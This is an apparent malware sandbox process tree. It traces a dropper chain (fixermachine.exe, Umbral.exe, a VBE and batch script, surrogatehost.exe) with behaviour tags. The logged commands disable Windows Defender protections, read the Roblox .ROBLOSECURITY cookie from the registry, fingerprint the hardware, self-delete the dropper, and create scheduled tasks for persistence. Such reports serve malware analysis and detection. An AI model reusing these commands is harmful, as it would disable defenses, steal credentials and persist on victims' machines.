C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 222⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY22⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption22⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory22⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid22⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV123⤵
-
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name22⤵
- Detects videocard installed
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause22⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV123⤵
-
-
C:\Windows\system32\PING.EXEping localhost23⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"21⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"22⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"23⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "24⤵
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"25⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"19⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"20⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"20⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"21⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"22⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "23⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV124⤵
-
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"24⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"18⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"19⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"19⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"20⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"21⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "22⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV123⤵
-
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"23⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"17⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"18⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"18⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"19⤵
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"20⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "21⤵
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"22⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"16⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"17⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"17⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"18⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"19⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "20⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"21⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"15⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"16⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"16⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"17⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"18⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "19⤵
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"20⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"14⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"15⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"15⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"16⤵
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"17⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "18⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"19⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"13⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"14⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"14⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"15⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"16⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "17⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"18⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"12⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"13⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"13⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"14⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"15⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "16⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV117⤵
-
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"17⤵
- Executes dropped EXE
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"11⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"12⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"12⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"13⤵
- Executes dropped EXE
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"14⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "15⤵
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"16⤵
- Executes dropped EXE
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"10⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"11⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"11⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"12⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"13⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "14⤵
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"15⤵
- Executes dropped EXE
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"9⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"10⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"10⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"11⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"12⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "13⤵
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"14⤵
- Executes dropped EXE
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"9⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"10⤵
- Executes dropped EXE
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"11⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "12⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"13⤵
- Executes dropped EXE
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"8⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"9⤵
- Executes dropped EXE
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"10⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "11⤵
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"12⤵
- Executes dropped EXE
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"9⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "10⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"11⤵
- Executes dropped EXE
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"8⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "9⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"10⤵
- Executes dropped EXE
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"5⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "8⤵
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"9⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"6⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "7⤵
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"4⤵
- Views/modifies file attributes
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory4⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause4⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
C:\Windows\system32\PING.EXEping localhost5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "6⤵
- Suspicious use of WriteProcessMemory
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"7⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\k2QeKZNShT.bat"8⤵
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:29⤵
-
-
C:\Windows\it-IT\TextInputHost.exe"C:\Windows\it-IT\TextInputHost.exe"9⤵
- Executes dropped EXE
-
-
-
-
-
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "surrogatehosts" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Portable Devices\surrogatehost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "surrogatehost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\surrogatehost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "surrogatehosts" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Portable Devices\surrogatehost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Cookies\smss.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Users\Admin\Cookies\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\Cookies\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
